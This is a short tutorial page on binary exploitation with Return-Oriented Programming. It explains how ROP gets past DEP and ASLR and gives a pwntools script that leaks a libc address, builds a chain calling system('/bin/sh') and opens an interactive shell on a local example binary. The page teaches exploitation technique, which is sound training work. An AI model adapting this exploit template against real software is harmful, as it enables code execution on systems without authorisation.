icon

Binary Exploitation with ROP

Last modified: 2023-02-12

ROP (Return-Oriented Programming) is a technique used to bypass security mechanisms such as data execution prevention (DEP) or address space layout randomization (ASLR). It allows us to exploit the arbitrary code by chaining together small, existing code snippets (called “gagdets”) within a program, rather than injecting new malicious code.

Exploitation

Pwntools can build ROP chains so we'll use it for exploitation.

from pwn import *

elf = context.binary = ELF('./example')
libc = elf.libc
p = process()

# get the base address
p.recvuntil('Enter name: ')
base_addr = int(p.recvline(), 16)

# set our libc address according to the base address
libc.address = base_addr - libc.sym['system']
log.success('LIBC base: {}'.format(hex(libc.address)))

# get location of binsh from libc
binsh = next(libc.search(b'/bin/sh'))

# build the rop chain
rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)

# send our rop chain
p.sendline(rop.chain())

# Get the shell
p.interactive()